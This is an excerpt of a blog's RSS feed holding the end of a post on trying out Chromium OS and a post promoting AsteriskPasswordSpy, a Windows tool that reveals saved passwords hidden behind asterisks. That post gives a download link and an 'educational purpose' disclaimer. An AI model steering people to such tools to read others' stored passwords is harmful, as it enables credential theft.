&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Login with chronos and password. This will log you in as a local user. Once you log in, you should see what looks almost just like the &lt;a href=&quot;http://www.google.com/chrome&quot;&gt;Google Chrome browser&lt;/a&gt;. If you click on the Chrome sphere in the upper left corner, you should see a Google Accounts login page telling you to log into Welcome. Log in with your Google Account.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/11/chromium-os-welcome-login.png&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;If you do not see this page and you get a browser page that says it could not find the page requested, then unfortunately luck is not on your side. It means that Chromium OS doesn’t like your network adapter. You could still however try it out in a virtual machine if you so desire. If you were able to succesfully log in, you should then see the application page.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/11/chromium-os-app-page.png&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;As you can see, it is all in the cloud. All the applications you see on the app page bring up different webpages, and everything you do takes place within the browser. In my experience, although it did boot up relatively fast, the browser tends to run a bit slow and is a bit jumpy. Although the calculator and notepad launch properly in little popover windows, the apps don’t work and nothing loads into the windows at all.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The To-do List application doesn’t work either, and you get a Google.com account login page. Note, this is not the same as a Google Accounts login so you won’t be able to log in with your Google Account. The Google.com login page is only for Google employees. The Contacts application brings up a Google Talk gadget that doesn’t appear to work.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;As I said earlier, a lot of the stuff isn’t working right. You’ll also see right at the top of the application page a message that says UI under development. Designs are subject to change.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;All the other applications are simply links to webpages. One thing that I found rather amusing is that when you click on the Hotmail icon, it takes you to Gmail. However, the Yahoo! Mail icon does indeed bring you to the Yahoo! Mail login page. I suppose Google likes Yahoo! better than they do Microsoft.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;So what do you think of Chrome OS? Do you think it is the netbook operating system of the future?&lt;/div&gt;&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/how-to-run-google-chrome-os.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-4273514614754249379</guid><pubDate>Thu, 18 Aug 2011 08:43:00 +0000</pubDate><atom:updated>2011-08-18T01:43:07.486-07:00</atom:updated><title>Asterisk Password Recovery</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;AsteriskPasswordSpy is the FREE tool to instantly reveal the hidden password behind asterisks (*****). It&#39;s user friendly interface can help you to easily find the passwords from any Windows based application.You can simply drag the &#39;search icon&#39; to any password box to find the real password hidden by those asterisks. &lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://securityxploded.net/getfile.php?file=AsteriskPasswordSpy.zip&quot;&gt;Click here to Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Most applications do not display real password in the login box for security reasons and instead they show the asterisks (****). But often there is need to know the actual password especially if you have forgotten password that you have entered while ago. &lt;br /&gt;
&lt;br /&gt;
In such cases, AsteriskPasswordSpy will help you to easily find out the real password hidden behind asterisks.&lt;br /&gt;
&lt;br /&gt;
AsteriskPasswordSpy comes with Installer for local installation &amp;amp; un-installation. It works on wide range of platforms starting from Windows XP to latest operating system Windows 7.&lt;/span&gt;&lt;div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://passwordforensics.com/images/asteriskpasswordspy_installer.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;246&quot; src=&quot;http://passwordforensics.com/images/asteriskpasswordspy_installer.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://passwordforensics.com/images/asteriskpasswordspy_mainscreen_big.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;http://passwordforensics.com/images/asteriskpasswordspy_mainscreen_big.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://passwordforensics.com/images/asteriskpasswordspy_screen2_big.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;191&quot; src=&quot;http://passwordforensics.com/images/asteriskpasswordspy_screen2_big.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://passwordforensics.com/images/asteriskpasswordspy_export_big.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;207&quot; src=&quot;http://passwordforensics.com/images/asteriskpasswordspy_export_big.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; style=&quot;background-color: white; border-bottom-color: rgb(48, 48, 48); border-bottom-style: solid; border-bottom-width: 0px; border-left-color: rgb(48, 48, 48); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(48, 48, 48); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(48, 48, 48); border-top-style: solid; border-top-width: 0px; color: #121212; font-family: Verdana, &#39;Bitstream Vera Sans&#39;, &#39;DejaVu Sans&#39;, Tahoma, Geneva, Arial, sans-serif; font-size: 11px; line-height: 15px; text-align: justify; vertical-align: middle; width: 670px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: left; vertical-align: bottom;&quot;&gt;&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; style=&quot;background-color: white; border-bottom-color: rgb(48, 48, 48); border-bottom-style: solid; border-bottom-width: 0px; border-left-color: rgb(48, 48, 48); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(48, 48, 48); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(48, 48, 48); border-top-style: solid; border-top-width: 0px; float: left; text-align: justify; vertical-align: middle; width: 670px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: justify; vertical-align: top;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: left; vertical-align: bottom;&quot;&gt;&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/asterisk-password-recovery.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item></channel></rss>